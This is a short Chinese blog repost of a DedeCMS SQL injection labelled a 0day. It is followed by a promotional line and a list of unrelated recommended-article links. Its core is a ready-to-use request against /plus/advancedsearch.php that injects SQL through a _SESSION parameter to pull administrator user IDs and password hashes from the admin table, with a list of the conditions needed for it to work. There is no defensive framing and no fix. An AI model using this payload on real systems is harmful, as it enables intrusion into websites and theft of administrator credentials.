dedecms有条件sql注入(x0day)

https://www.t00ls.net/thread-35569-1-1.html

http://localhost/dedecms/plus/advancedsearch.php?mid=1&_SESSION[123]=select concat(0x7c,userid,0x7c,pwd,0x7c) as aid from `%23@__admin` aaa &sqlhash=123

条件利用：

1.漏洞代码在/plus/advancedsearch.php 文件中
2.是一个sql注入的漏洞
3.php要开启session.auto_start = 1
4.漏洞存在和session有关

【推广】免费学中医，健康全家人

原文地址：https://www.cnblogs.com/hookjoy/p/5820218.html

推荐文章
js点击回到顶部
tfs
SQL 设置登录名和密码
窗口居中弹出
knockout jquery警告删除
knockout 和mvc4结合使用
IE兼容HTML5
创建表之前判断表是否存在，如果存在则删除已有表
Sql 主键设置
本地文件复制到远程文件
SQL Server触发器创建、删除、修改、查看示例步骤
1005 大数加法 ——51Nod（java BigInteger）
Floyd算法详解（转）
关于矩阵快速幂の简单粗暴の理解
POJ 3070 Fibonacci （矩阵幂运算）
HDU 2014
杭电ACM 2028 Lowest Common Multiple Plus
HDU 2035-人见人爱A^B(乘方取模)
第几天？
Minimum Inversion Number HDU
find the safest road HDU
分页存储过程
.NET Core与.NET Framework、Mono之间的关系
winForm开发
面试题目总结
sqlserver锁表、解锁、查看锁表
架构漫谈（四）：如何做好架构之架构切分
多线程讲解
递归菜单简单应用
杂记